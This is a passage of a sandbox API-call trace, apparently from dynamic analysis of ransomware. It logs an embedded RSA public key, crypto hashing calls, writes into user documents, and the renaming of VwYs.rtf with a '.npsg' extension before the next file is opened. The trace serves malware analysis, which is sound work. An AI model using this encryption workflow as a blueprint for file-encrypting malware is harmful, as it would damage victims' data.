KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.847] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.848] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.848] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.848] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.848] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.848] GetLastError () returned 0x0 [0236.848] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.848] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.848] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.848] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.848] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.849] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0236.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003b0 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400398 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.850] GetCurrentThreadId () returned 0x5b4 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79738 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.850] GetCurrentThreadId () returned 0x5b4 [0236.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003b0 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400410 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003c8 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400428 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003c8 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400398 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400368 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95980 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.854] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x16da1, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x16da1, lpOverlapped=0x0) returned 1 [0236.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.855] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16da6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.855] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.855] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.855] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.855] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.855] CloseHandle (hObject=0x644) returned 1 [0236.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b81cd0 [0236.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.857] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VwYs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vwys.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VwYs.rtf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vwys.rtf.npsg")) returned 1 [0236.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.875] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.877] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c0eeaf0, ftCreationTime.dwHighDateTime=0x1d53feb, ftLastAccessTime.dwLowDateTime=0x3e3c9ac0, ftLastAccessTime.dwHighDateTime=0x1d55d00, ftLastWriteTime.dwLowDateTime=0x3e3c9ac0, ftLastWriteTime.dwHighDateTime=0x1d55d00, nFileSizeHigh=0x0, nFileSizeLow=0x19b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wEdi.xlsx", cAlternateFileName="WEDI~1.XLS")) returned 1 [0236.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wEdi.xlsx") returned=".xlsx" [0236.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wEdi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wedi.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.877] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=6576) returned 1 [0236.877] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.880] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x198a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.880] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.882] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.882] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x19b0, lpOverlapped=0x0) returned 1 [0236.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.882] lstrlenA (lpString="-----BEGIN PUBLIC 